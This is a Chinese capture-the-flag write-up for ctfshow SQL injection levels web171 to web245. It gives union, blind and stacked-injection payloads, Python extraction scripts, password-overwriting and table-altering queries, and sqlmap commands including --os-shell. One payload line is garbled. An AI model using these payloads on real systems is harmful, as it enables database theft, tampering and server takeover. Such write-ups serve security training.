目录
web171
web172
web173
web174
web175
web176
web177-179
web180-183
web184
web185
web187
web190
web191
web192
web193
web194
web195
web196
web197
web199
web201
web202
web203
web204
web205
web206
web207
web208
web209
web210
web211
web212
web213
web225
web245
web171
获取库名:1'union select 1,group_concat(schema_name),3 from information_schema.schemata%23
获取表名:1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
获取字段名:1'union select 1,group_concat(password,username),3 from ctfshow_user%23
web172
这里可以使用database64加密。
1'union select 1,to_base64(password) from ctfshow_user where username="flag"%23
web173
使用16进制进行转换
1' union select 1,hex(password),3 from ctfshow_user3 where username='flag'%23
web174
进行写文件
1' union select 1,password from ctfshow_user4 into outfile '/var/www/html/1.txt'--+&page=1&limit
打开1.txt获取flag
web175
这里可以使用脚本跑
import requests
def get_pwd_len(url):
head = 1
tail = 100
ans = 0
while head < tail:
mid = (head + tail ) >> 1
payload = f"1'&&if(length((select(password)from(ctfshow_user5)where(id=26)))>{mid},sleep(2),0)#"
# print(uname)
param = {
'id': payload,
'page': '1',
'limit': '10'
}
res = requests.get(url=url,params=param)
try:
r = requests.get(url,params=param,timeout=0.5)
tail = mid
ans = mid
except Exception as e :
head = mid +1
print(ans)
# passwd长度为:45
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd_len(url)
def get_pwd(url):
ans = ""
for i in range(1, 46):
# print(i)
j = 46 - i
# print(j)
head = 32
tail = 127
while head <tail:
mid = (head + tail) >> 1 #>>是位移运算符 右移一位就是除以二
payload = f"1'&&if(ascii(substr((reverse(substr((select(password)from(ctfshow_user5)where(id=26))from({i}))))from({j})))>{mid},sleep(2),0)#"
# print(uname)
param = {
'id': payload,
'page': '1',
'limit': '10'
}
try:
res = requests.get(url=url,params=param,timeout=0.5)
tail = mid
except Exception as e:
head = mid + 1
if head != 32:
ans += chr(head)
else:
break
print(ans)
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd(url)
无空格和逗号
web176
使用大小写绕过
-1'uNion seleCt 1,groUp_concAt(username,password),3 frOm ctfshow_user%23
web177-179
使用括号绕过:-1'union(select(1),(group_concat(username,password)),(3)from(ctfshow_user))%23
使用注释绕过:-1'union/**/select/**/1,group_concat(username,password),3/**/from/**/ctfshow_user%23
反引号绕过:-1'union/**/select`id`,`username`,`password`from`ctfshow_user`%23
web180-183
过滤了注释符:
-1'union%0cselect(1),(group_concat(username,password)),(3)from(ctfshow_user)where(1)and'1
web184
过滤了很多,这里使用脚本测试
使用脚本
import requests
url="http://6ca99d4f-ef75-4808-92e8-5fc1a7b9548e.challenge.ctf.show/select-waf.php"
flag="ctfshow{"
def str_to_hex(s):
return ''.join([hex(ord(c)).replace('0x','') for c in s])
for i in range(0,100):
for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
data={
#'tableName':"ctfshow_user a inner join ctfshow_user b on b.pass like {}".format("0x"+str_to_hex(flag+j+"%"))
'tableName':f"ctfshow_user group by pass having pass like {'0x'+str_to_hex(flag+j+'%')}"
}
r=requests.post(url=url,data=data).text
if "$user_count = 1" in r:
flag+=j
print(flag)
if j=='}':
exit()
break
这里使用了like模糊查询。
web185
数字的表示,使用脚本
import requests
url = "http://47b18d10-5722-4603-961a-2ef4d5b872d8.challenge.ctf.show/select-waf.php"
flag = 'ctfshow{'
def createNum(n):
num = 'true'
if n == 1:
return 'true'
else:
for i in range(n - 1):
num += "+true"
return num
for i in range(45):
if i <= 8:
continue
for j in range(127):
data = {
"tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"
}
r = requests.post(url, data=data)
if r.text.find("$user_count = 43;") > 0:
if chr(j) != ".":
flag += chr(j)
print(flag.lower())
if chr(j) == "}":
exit(0)
break
web187
loadfile盲注
import requests
url="http://17e6ad41-8c34-4fb3-aa23-f9fbfc11d012.challenge.ctf.show/api/index.php"
flag="ctfshow{"
for i in range(0,100):
for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
payload="if((load_file('/var/www/html/api/index.php'))regexp('{}'),0,1)".format(flag+j)
data={
'username':payload,
'password':1
}
r=requests.post(url=url,data=data)
if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
flag+=j
print(flag)
if j=='}':
exit()
break
web190
无过滤的盲注
import requests
url = "http://87a2c8d4-69ca-4617-b96c-ce3601bdc1a6.challenge.ctf.show/api/"
result = ""
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# 查数据库 ctfshow_fl0g
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 查字段 id,f1ag
#payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
# 查flag
payload = "select group_concat(f1ag) from ctfshow_fl0g"
data = {
'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",
'password': '1'
}
r = requests.post(url,data=data)
if "密码错误" == r.json()['msg']:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
web191
ord函数盲注
Author:Y4tacker
import requests
url = "http://646c4493-3a66-407e-8ddf-c59355418a23.challenge.ctf.show/api/"
result = ""
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# 查数据库 ctfshow_fl0g
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
# 查字段 f1ag
#payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
# 查flag
payload = "select group_concat(f1ag) from ctfshow_fl0g"
data = {
'username': f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)='1",
'password': '1'
}
r = requests.post(url,data=data)
if "密码错误" == r.json()['msg']:
head = mid + 1
else:
# print(r.text)
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)
web192
过滤ord和ascll函数
import requests
import string
url = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/api/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
for i in range(1,45):
for j in flagstr:
payload = f"admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"
data = {
'username': payload,
'password': '1'
}
r = requests.post(url, data=data)
if "密码错误" == r.json()['msg']:
flag += j
print(flag)
if "}" == j:
exit(0)
break
web193
过滤sustr
Author:feng
import requests
url='http://fc1e9e65-4116-4635-aebc-05e37fef775f.challenge.ctf.show/api/'
flag=""
for i in range(0,100):
for j in "0123456789abcdefghijklmnopqrstuvwxyz-,{}_":
#payload="' or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)-- -".format(flag+j+"%")
#payload="' or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)-- -".format(flag+j+"%")
payload="' or if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag+j+"%")
data={
'username':payload,
'password':1
}
#print(payload)
r=requests.post(url=url,data=data)
#print(payload)
if r"\u5bc6\u7801\u9519\u8bef" in r.text:
flag+=j
print(flag)
if j=='}':
exit()
break
web194
locate()正则注入
Author:Y4tacker
import requests
# 应该还可以用instr等函数,LOCATE、POSITION、INSTR、FIND_IN_SET、IN、LIKE
url = "http://dee436de-268a-408e-b66a-88b4c972e5f5.chall.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
for i in range(1,45):
for j in stttr:
final += j
# 查表名-ctfshow_flxg
# payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
# 查字段-f1ag
# payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
data = {
'username': payload,
'password': '1'
}
r = requests.post(url,data=data)
if "密码错误" == r.json()['msg']:
print(final)
else:
final = final[:-1]
web195
堆叠注入,这里使用16进制
前面的是admin,后面的是111,就是将所有用户的密码修改为111,之后登陆即可。
使用16进制原因:$sql = "select pass from ctfshow_user where username = {$username};";(没有字符串单引号包围)
0x61646d696e;update`ctfshow_user`set`pass`=0x313131;
web196
payload:1;select(1)
web197
利用alter改名:1;alter table `ctfshow_user` change `pass` `feng` varchar(255); alter table `ctfshow_user` change `id` `pass` varchar(255)
import requests
url = "http://5f5edc35-cd47-49e5-9252-5a3301edd9f3.challenge.ctf.show/api/"
for i in range(100):
if i == 0:
data = {
'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
'varchar(255);',
'password': f'{i}'
}
r = requests.post(url, data=data)
data = {
'username': '0x61646d696e',
'password': f'{i}'
}
r = requests.post(url, data=data)
if "登陆成功" in r.json()['msg']:
print(r.json()['msg'])
break
#登陆成功 flag is ctfshow{1e8cd464-117c-4863-a8ea-0e7b83d3d9fe}
web199
payload:
1;show tables
ctfshow_user
show tables;会显示表名,也就是ctfshow_user那么这个时候会将查出来的这个值当成密码,也就是密码为ctfshow_user
sqlmap注入
web201
referer绕过
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" -D ctfshow_web --T ctfshow_user --dump --batch
web202
data绕过:
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" -D ctfshow_web --T ctfshow_user --dump --batch
web203
请求方式绕过(必须加index.php)
//检测是否有注入点
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain"--batch
//探测数据库名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" --dbs --batch
//看到ctfshow_web数据库,探测表名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --tables --batch
//获取一个表名ctfshow_user,获取列名
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web -T ctfshow_user --columns --batch
//获取列名后看到三个列名,直接dump
python sqlmap.py -u http://e03b8694-2a59-4d02-96c2-fde5f26a427d.challenge.ctf.show/api/?id= --referer="ctf.show" --data="id=1" --method=PUT --herders="Content-Type: text/plain" -D ctfshow_web --T ctfshow_user --dump --batch
web204
包含cookie
>python sqlmap.py -u http://41ecd4df-c94a-4612-af16-2b0b6c834e9e.challenge.ctf.show/api/index.php --data="id=1" --method=PUT --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=5gqkmm2fh7l226lf4s9q4nl444; ctfshow=885b1983b7f7963b7d736fd8b93c185f" -D ctfshow_web -T ctfshow_user --dump --batch
web205
访问安全连接
它先访问的getToken,
--safe-url 设置在测试目标地址前访问的安全链接
--safe-freq 设置两次注入测试前访问安全链接的次数
python sqlmap.py -u http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://158eb741-2a3a-4643-a9d6-94360dc171b9.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web -T ctfshow_flax -C flagx --dump --batch
web206
符号闭合
python sqlmap.py -u http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd7e2227-9bd9-4929-9e06-ae3781d38591.challenge.ctf.show/api/getToken.php" --safe-freq=1 -D ctfshow_web --prefix="')" --suffix="#"-T ctfshow_flax --dump --batch
--prefix:前置闭合
--suffix:后置闭合
web207
--temper自己的脚本编写
python sqlmap.py -u http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://7a02b099-af2d-45fe-9a06-562855b134c9.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump
web208
大小写空格前后包含
python sqlmap.py -u "http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://fafc4bcc-ec09-4b48-96d1-665c8e7e967d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment(替换空格),randomcase(替换大小写)" --batch -D ctfshow_web -T ctfshow_flaxcac -C flagvca --dump
web209
过滤了星号等号和空格
编写脚本web209
python sqlmap.py -u http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://aa386482-7cfb-4336-b39a-ae4c279921a4.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump
web210
对base64进行解密
python sqlmap.py -u http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://1c7a89da-dee8-4374-9d72-d1cdedb9583a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump
web211
绕过翻转字符/
python sqlmap.py -u http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://cd0fdb00-049a-4e5a-8ce1-547261224fb3.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dump
web212
过滤单引号空格,继续使用210脚本
sqlmap>python sqlmap.py -u http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e44ed589-be5e-4423-8e2c-4bca30a67e6c.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T ctfshow_flavis --dump
web213
使用os-shell一键getshell
python sqlmap.py -u http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://517718e5-3471-4848-9ecf-ac4b22a4a01e.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web210 --dump --os-shell --batch
上传文件后进行命令执行操作。
web225
堆叠注入handler读取数据。
payload:
?username=1';show tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;handler ctfshow_flagasa close;&page=1&limit=10
报错注入
web245
模板
api/?id=1' and extractvalue(1,concat(0x7e,([]),0x7e))-- #&page=1&limit=10
表名
api/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))-- #&page=1&limit=10
字段名
api/?id=1' and extractvalue(1,conccmn_name) from information_schema.columns where table_name='ctfshow_flagsa'),0x7e))-- #&page=1&limit=10
数据 分开读
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
api/?id=1' and extractvalue(1,concat(0x7e,(select right(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10
api/?id=1' and extractvalue(1,concat(0x7e,(select left(flag1,30) from ctfshow_flagsa),0x7e))-- #&page=1&limit=10